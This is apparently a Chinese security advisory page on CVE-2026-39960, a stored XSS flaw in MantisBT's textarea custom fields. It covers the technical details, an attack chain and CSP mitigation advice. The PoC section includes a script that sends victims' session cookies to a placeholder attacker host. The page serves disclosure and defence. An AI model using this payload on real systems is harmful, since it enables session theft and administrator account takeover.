CVE-2026-39960 CVSS 5.4 中危

CVE-2026-39960 MantisBT存储型XSS漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39960

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Mantis Bug Tracker (MantisBT)

漏洞概述

Mantis Bug Tracker 2.28.1及以下版本在更新问题页面对textarea自定义字段内容处理时存在逻辑缺陷，未能正确转义。低权限攻击者可利用此漏洞注入恶意HTML及JavaScript代码，若CSP设置允许，当其他用户（包括管理员）查看页面时将触发代码执行，进而窃取会话凭证并接管管理员账户。

技术细节

该漏洞的根源在于MantisBT的`bug_update_page.php`文件在渲染textarea自定义字段时，存在逻辑缺陷导致输出转义不完整。攻击者首先需要是一个拥有Bug报告权限的认证用户，并且目标项目必须配置了textarea类型的自定义字段。利用过程中，攻击者在提交或更新Issue时，将恶意HTML/JavaScript载荷写入该字段。当具有更高权限（如管理员）的用户访问该Issue的编辑页面时，服务器直接返回未转义的数据，浏览器解析恶意脚本。虽然默认CSP策略可能阻止脚本执行，但在宽松策略下，攻击者可通过XSS窃取Session ID，进而接管管理员账户，获取敏感数据或进行进一步破坏。

攻击链分析

STEP 1

步骤1

攻击者使用具有Bug报告权限的低权限账户登录MantisBT系统。

STEP 2

步骤2

确认项目中配置了textarea类型的自定义字段。

STEP 3

步骤3

攻击者新建或编辑一个Issue，在textarea自定义字段中注入恶意HTML/JavaScript代码。

STEP 4

步骤4

诱导或等待管理员或其他高权限用户访问该Issue的更新页面(bug_update_page.php)。

STEP 5

步骤5

管理员浏览器解析未转义的恶意脚本，执行攻击者代码，导致会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: Inject into textarea custom field -->
<img src=x onerror=alert('CVE-2026-39960')>
<script>
  // Example: Send session cookie to attacker
  var img = new Image();
  img.src = "http://attacker-server.com/steal?c=" + document.cookie;
</script>

影响范围

Mantis Bug Tracker <= 2.28.1

防御指南

临时缓解措施

如果无法立即升级，建议确保使用默认的Content-Security Policy (CSP)，该策略默认阻止脚本执行，从而有效缓解此漏洞被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表